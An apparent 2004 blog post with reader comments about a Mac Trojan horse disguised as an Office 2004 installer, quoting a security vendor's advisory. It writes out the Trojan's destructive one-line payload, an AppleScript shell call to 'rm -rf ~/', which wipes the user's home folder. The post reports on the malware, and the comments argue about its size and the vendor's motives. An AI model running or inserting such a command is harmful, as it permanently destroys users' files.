Trojan Horses
Posted May 13th, 2004 @ 02:23pm by Erik J. Barzeski
File this one under "if you're stupid enough to run a 108k 'Office 2004' Installer from a peer-to-peer network, you deserve to have all of your ~/ deleted":
Intego, the Macintosh security specialist, was notified by Macworld (UK) on May 10, 2004 about a Trojan horse, discovered by one of its readers who downloaded and ran an application from the Gnutella peer-to-peer network. The AS.MW2004.Trojan is a compiled AppleScript applet, a 108 KB self-contained application, with an icon resembling an installer for Microsoft Office 2004 for Mac OS X. This AppleScript runs a Unix command that removes files, using AppleScript's ability to run such commands. The AppleScript displays no messages, dialogs or alerts. Once the user double-clicks this file, their home folder and all its contents are deleted permanently.
run shell script "rm -rf ~/". BTW, I love the screenshot they've got on their site: "What would you like to do: repair?" Just friggin' delete the damn thing, what's a repair going to do but leave you with an AppleScript that doesn't do anything? And when you're done deleting that, delete your P2P software too.
In other exciting news, I've just finished iTunes 4.6!!! It circumvents the iTunes Music Store and lets you download music for free. Plus, it works in Europe and Antarctica!!! Download it here (157k .dmg).
Uh huh.
Posted 13 May 2004 at 2:54pm #
Apparently, the fine folks at Intego realized you need viruses if you're going to sell virus software...
Posted 13 May 2004 at 3:09pm #
They're idiots... The moose at the gate should have told you that.
Posted 13 May 2004 at 3:47pm #
In all honesty, the 108k bit isn't necessarily an indicator that it isn't real. It's totally possible to download a stub that fetches the meat from a remote site. We did this at Mplayer/HearMe, and I think Netscape did it for a while too.
- Scott
Posted 13 May 2004 at 4:13pm #
Well, if a w4r3z kiddie wants to fetch a version of Office 2004 directly from microsoft.com...
Posted 13 May 2004 at 7:40pm #
Am I alone in holding Intego partially responsible for the appearance of this Trojan horse? Within weeks of their FUD press release, which up to that time had appeared only in a technical bulletin board, and was unlikely to be caught by anyone interested in causing any damage, an actual malicious program appears based on similar techniques. I'm not implying that they wrote or released the Trojan horse, but I do think that their earlier press release was irresponsible and likely led to this Trojan horse being released.
Posted 13 May 2004 at 8:18pm #
This is a test.
Posted 13 May 2004 at 9:11pm #
I am the upgrade document...